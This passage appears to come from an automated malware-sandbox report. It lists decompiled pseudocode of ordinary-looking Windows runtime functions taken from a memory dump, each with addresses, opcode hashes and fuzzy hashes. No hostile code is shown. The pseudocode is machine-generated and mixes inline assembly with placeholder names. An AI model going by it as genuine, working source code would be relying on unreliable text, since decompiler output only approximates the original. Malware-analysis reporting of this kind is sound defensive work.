                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E010DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E010B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                          0x010dfd9b
                                          0x010dfda0
                                          0x010dfda1
                                          0x010dfdab
                                          0x010dfdad
                                          0x010dfdb0
                                          0x010dfdb8
                                          0x010dfe0f
                                          0x010dfde6
                                          0x010dfde9
                                          0x010dfdec
                                          0x0111c0c0
                                          0x010dfdfe
                                          0x010dfe06
                                          0x010dfe06
                                          0x0111c0c8
                                          0x010dfe2d
                                          0x010dfe2d
                                          0x00000000
                                          0x010dfe2d
                                          0x0111c0d1
                                          0x0111c0e0
                                          0x0111c0e5
                                          0x0111c0e5
                                          0x0111c0e8
                                          0x00000000
                                          0x0111c0e8
                                          0x010dfdf4
                                          0x00000000
                                          0x00000000
                                          0x010dfdf6
                                          0x010dfdfa
                                          0x010dfe1a
                                          0x010dfe1f
                                          0x010dfe1f
                                          0x010dfdfc
                                          0x00000000
                                          0x010dfdfc
                                          0x010dfdcc
                                          0x010dfdd0
                                          0x010dfe26
                                          0x00000000
                                          0x010dfe26
                                          0x010dfdd8
                                          0x010dfddb
                                          0x010dfddd
                                          0x010dfde0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: 31f7c797b6c58c0df24e6ae0e420c20cb62ecf4ef6b1b8d27be8fc323a267c0a
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: 57216A72640742DFD735DF49C540A66F7E5EF94B10F24817EE98687615D7309D02CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DB390 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E010DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E010C2280(_t12, 0x1198608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E010E00C2(0x1198608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                          0x010db395
                                          0x010db3a2
                                          0x010db3a5
                                          0x010db3aa
                                          0x010db3b2
                                          0x010db3ba
                                          0x010db3bd
                                          0x010db3c0
                                          0x010db3c4
                                          0x010db3c9
                                          0x0111a3e9
                                          0x0111a3ed
                                          0x0111a3f0
                                          0x0111a3ff
                                          0x0111a403
                                          0x0111a409
                                          0x00000000
                                          0x00000000
                                          0x0111a40b
                                          0x0111a40b
                                          0x0111a40f
                                          0x0111a415
                                          0x0111a423
                                          0x0111a423
                                          0x0111a415
                                          0x010db3d1
                                          0x010db3e8
                                          0x010db3e8
                                          0x010db3d9

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 013c147d43a2bd2e32d7c592559d1e17c042389a08d184dc17db05913f618c12
                                          • Instruction ID: b327cc8d23eb3ffe49cac5bae5b177d8c92480659b054c2a2d96042c9bd33e4f
                                          • Opcode Fuzzy Hash: 013c147d43a2bd2e32d7c592559d1e17c042389a08d184dc17db05913f618c12
                                          • Instruction Fuzzy Hash: 94114C337162145BCB1D8A199E81A6FB6A6EBC6630B25813DDD56DB380CE315C02C6D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A9240 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E010A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x117f708);
				E010FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E010E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E010E95D0();
				_t33 =  *0x11984c4; // 0x0
				L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x11984c4; // 0x0
				L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x11984c4; // 0x0
				E010C2280(L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E010E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E010E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E010A9325();
					_t50 =  *0x11984c4; // 0x0
					return E010FD0D1(L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                          0x010a9240
                                          0x010a9242
                                          0x010a9247
                                          0x010a924c
                                          0x010a924e
                                          0x010a9255
                                          0x010a9257
                                          0x010a925a
                                          0x010a925f
                                          0x010a925f
                                          0x010a9266
                                          0x010a9271
                                          0x010a9276
                                          0x010a9279
                                          0x010a927e
                                          0x010a9295
                                          0x010a929a
                                          0x010a92b1
                                          0x010a92b6
                                          0x010a92d7
                                          0x010a92dc
                                          0x010a92e0
                                          0x010a92e6
                                          0x010a92e8
                                          0x010a92ee
                                          0x010a9332
                                          0x010a9333
                                          0x010a9337
                                          0x010a9338
                                          0x010a933a
                                          0x010a933a
                                          0x010a933d
                                          0x010a9342
                                          0x010a9342
                                          0x010a9345
                                          0x010a9349
                                          0x010a934e
                                          0x010a9352
                                          0x010a9357
                                          0x010a92f4
                                          0x010a92f4
                                          0x010a92f6
                                          0x010a92f9
                                          0x010a9300
                                          0x010a9306
                                          0x010a9324
                                          0x010a9324

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: be723c16359fbcbadbe1d999d44a36d5f131618c598a09fdc3370c6d84b07221
                                          • Instruction ID: 7d50e07f08e14e9624267edf2f0b5d9dfc26a33cfd620bfb2df4f752e4584a76
                                          • Opcode Fuzzy Hash: be723c16359fbcbadbe1d999d44a36d5f131618c598a09fdc3370c6d84b07221
                                          • Instruction Fuzzy Hash: 7B213972141601DFC725EFA8CA04B9AB7F9BF18708F04456CE199876A1CB34E941CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01134257 Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E01134257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x11808d0);
				E010FD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E011341E8(__ebx, __edi, __ecx, _t39);
				E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x11987e4;
					_t18 =  *0x11987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1195cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x11987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x11987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L010A7055(_t31 + 0xfffffff8);
								_t24 =  *0x11987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x11987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1195cd0;
				if( *0x1195cd0 <= 0) {
					L010A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x11987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x11987e8 = _t30;
						 *0x11987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E010FD0D1(L01134320());
			}















                                          0x01134257
                                          0x01134257
                                          0x01134257
                                          0x01134259
                                          0x0113425e
                                          0x01134263
                                          0x01134265
                                          0x01134273
                                          0x01134278
                                          0x0113427c
                                          0x0113427f
                                          0x01134281
                                          0x01134287
                                          0x011342d7
                                          0x011342d7
                                          0x011342da
                                          0x0113428d
                                          0x0113428d
                                          0x0113428f
                                          0x01134292
                                          0x01134297
                                          0x0113429c
                                          0x011342a0
                                          0x011342a6
                                          0x011342a8
                                          0x011342ae
                                          0x011342b3
                                          0x00000000
                                          0x011342ba
                                          0x011342ba
                                          0x011342bf
                                          0x011342c5
                                          0x011342ca
                                          0x011342cf
                                          0x011342d0
                                          0x00000000
                                          0x011342d0
                                          0x011342b3
                                          0x00000000
                                          0x011342a6
                                          0x0113429c
                                          0x011342dc
                                          0x011342dc
                                          0x011342e3
                                          0x01134309
                                          0x011342e5
                                          0x011342e5
                                          0x011342e8
                                          0x011342ee
                                          0x011342f0
                                          0x00000000
                                          0x011342f2
                                          0x011342f2
                                          0x011342f4
                                          0x011342f7
                                          0x011342f9
                                          0x01134300
                                          0x01134300
                                          0x011342f0
                                          0x0113430e
                                          0x0113431f

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c41f6082a74c28e483baa8b6d8051e02f6620fba7c5a55a31eeda4e8186d98bb
                                          • Instruction ID: 6b4556f9b0a99e8d9cfeccde6ccf00f4d6b6d2550f1779cb288926b5714c5a10
                                          • Opcode Fuzzy Hash: c41f6082a74c28e483baa8b6d8051e02f6620fba7c5a55a31eeda4e8186d98bb
                                          • Instruction Fuzzy Hash: DB216A70501A06CFC72DDF68E000A58BBF1FB86354B50C26ED1B9DBAAADB31A491CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D2397 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E010D2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x119848c != 0) {
					L010CFAD0(0x1198610);
					if( *0x119848c == 0) {
						E010CFA00(0x1198610, _t19, _t27, 0x1198610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E010D2581(0x1198610, 0x10850a0, _t26, _t27, _t28);
						E010CFA00(0x1198610, 0x10850a0, _t27, 0x1198610);
					}
				} else {
					L1:
					_t11 =  *0x1198614; // 0x0
					if(_t11 == 0) {
						_t11 = E010E4886(0x1081088, 1, 0x1198614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E010D2581(0x1198610, (_t11 << 4) + 0x1085070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                          0x010d23b0
                                          0x010d23b6
                                          0x010d2409
                                          0x010d2415
                                          0x01115ae9
                                          0x00000000
                                          0x010d241b
                                          0x010d241b
                                          0x010d241d
                                          0x010d2427
                                          0x010d242e
                                          0x010d2430
                                          0x010d2430
                                          0x010d23b8
                                          0x010d23b8
                                          0x010d23b8
                                          0x010d23bf
                                          0x010d23fc
                                          0x010d23fc
                                          0x010d23c1
                                          0x010d23c3
                                          0x010d23d0
                                          0x010d23d8
                                          0x010d23d8
                                          0x010d23dc
                                          0x010d23de
                                          0x010d23e1
                                          0x010d23e1
                                          0x010d23ec

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 443155e9b9055cd9dbdc44ad068c3bc6d2ecd0d29d66b76b22b9e8d74f8b5119
                                          • Instruction ID: 5b35987ac6a541ee2fc30693e34170d1b9d524968dfef123a3f7ac41f604b674
                                          • Opcode Fuzzy Hash: 443155e9b9055cd9dbdc44ad068c3bc6d2ecd0d29d66b76b22b9e8d74f8b5119
                                          • Instruction Fuzzy Hash: A9112B7274430167E734A62EEC40F59F6D9FBA1610F14806AF6C2EB140CEB0E841CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011246A7 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E011246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E010EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E010DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L010C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                          0x011246b7
                                          0x011246ba
                                          0x011246c5
                                          0x011246c8
                                          0x011246d0
                                          0x011246d4
                                          0x011246e6
                                          0x011246e9
                                          0x011246f4
                                          0x011246ff
                                          0x01124705
                                          0x01124706
                                          0x0112470c
                                          0x01124713
                                          0x0112471b
                                          0x01124723
                                          0x01124725
                                          0x011246d6
                                          0x011246d9
                                          0x011246db
                                          0x011246db
                                          0x01124732

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 731cbd49ca3c01499d4582eb21b8b9cf1fe3cd52bb7a6d6bcc34b73f94571232
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction Fuzzy Hash: 1711E572504208BFC7159F6DD8808BEB7B9EF95710F10806EF984CB351DA318D55D7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AC962 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E010AC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x119d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E010BEEF0(0x11970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0112F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E010BEB70(_t29, 0x11970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E010EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0112F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x11970c0; // 0x0
					while(_t38 != 0x11970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x119b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                          0x010ac96a
                                          0x010ac974
                                          0x010ac988
                                          0x010ac98a
                                          0x01117c9d
                                          0x01117c9f
                                          0x01117ca4
                                          0x01117cae
                                          0x01117cf0
                                          0x01117cf5
                                          0x01117cfa
                                          0x010ac992
                                          0x010ac996
                                          0x010ac997
                                          0x010ac998
                                          0x010ac9a3
                                          0x010ac9a3
                                          0x01117cb0
                                          0x01117cb7
                                          0x01117cbb
                                          0x00000000
                                          0x00000000
                                          0x01117cbd
                                          0x01117ce8
                                          0x01117cc5
                                          0x01117cc8
                                          0x01117cca
                                          0x01117cd0
                                          0x01117cd6
                                          0x01117cde
                                          0x01117ce4
                                          0x01117ce4
                                          0x01117cd0
                                          0x00000000
                                          0x01117ce8
                                          0x010ac990
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18893fcf5fcc18276f3ed840ec7e0ef1b997b43b548dc3263e8218d74052006
                                          • Instruction ID: 512f92e7d8af5f908f85648b2816e21733a5aebec436b6ba53d041999cd93b8a
                                          • Opcode Fuzzy Hash: b18893fcf5fcc18276f3ed840ec7e0ef1b997b43b548dc3263e8218d74052006
                                          • Instruction Fuzzy Hash: 431102313106039BCB28AE28D885AABBBE1BF84610F040538E8A583694DB20EC60CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E37F5 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E010E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E010C2280(_t6, 0x1198550);
				}
				_t29 = E010E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E010BFFB0(0x1198550, _t27, 0x1198550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                          0x010e37fa
                                          0x010e37fc
                                          0x010e3805
                                          0x010e3808
                                          0x010e3808
                                          0x010e3814
                                          0x010e3818
                                          0x010e3846
                                          0x010e3848
                                          0x010e384b
                                          0x010e384b
                                          0x010e3852
                                          0x00000000
                                          0x010e3854
                                          0x010e3856
                                          0x00000000
                                          0x00000000
                                          0x010e3863
                                          0x00000000
                                          0x010e3863
                                          0x010e381a
                                          0x010e381a
                                          0x010e381f
                                          0x010e386e
                                          0x010e386e
                                          0x010e3871
                                          0x010e3873
                                          0x010e3873
                                          0x010e3868
                                          0x00000000
                                          0x010e3868
                                          0x010e3821
                                          0x010e3826
                                          0x00000000
                                          0x00000000
                                          0x010e3828
                                          0x010e382a
                                          0x010e3841
                                          0x00000000
                                          0x010e3841

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 31af3f31a19ede0e1b0ccc411b206143bfcd51eb681dd9f3ecadfcf7d23e600a
                                          • Instruction ID: df4a32b44c792db01edbbaa0df0377928a76255078ff8153c7e42734b7a9a5c9
                                          • Opcode Fuzzy Hash: 31af3f31a19ede0e1b0ccc411b206143bfcd51eb681dd9f3ecadfcf7d23e600a
                                          • Instruction Fuzzy Hash: C101A1729017119FC3278B1F9A48A2ABFE6FF86A5071540AAE9958F215DB30C801CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D002D Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010D002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E010C7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E010C7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E010C7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E010C7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                          0x010d0032
                                          0x010d0037
                                          0x010d0043
                                          0x01114b3a
                                          0x010d0049
                                          0x010d0049
                                          0x010d0049
                                          0x010d004e
                                          0x010d0053
                                          0x01114b48
                                          0x01114b5a
                                          0x01114b4a
                                          0x01114b53
                                          0x01114b53
                                          0x01114b5f
                                          0x00000000
                                          0x01114b61
                                          0x00000000
                                          0x01114b61
                                          0x010d0059
                                          0x010d0059
                                          0x010d0060
                                          0x01114b6f
                                          0x01114b6f
                                          0x010d0069
                                          0x01114b83
                                          0x00000000
                                          0x00000000
                                          0x01114b90
                                          0x01114b9b
                                          0x01114b9b
                                          0x01114ba4
                                          0x00000000
                                          0x00000000
                                          0x01114baa
                                          0x00000000
                                          0x010d006f
                                          0x010d006f
                                          0x00000000
                                          0x010d006f
                                          0x010d0069

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 7f63ff00e0d68dad8cfb02030675e876904cf9dfae2a5c9873be3a9608d9dae9
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: 751104722057819FE727972CC944B39BBE4BF40F54F0900F0FE498BA96D329D841CA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B766D Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E010B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
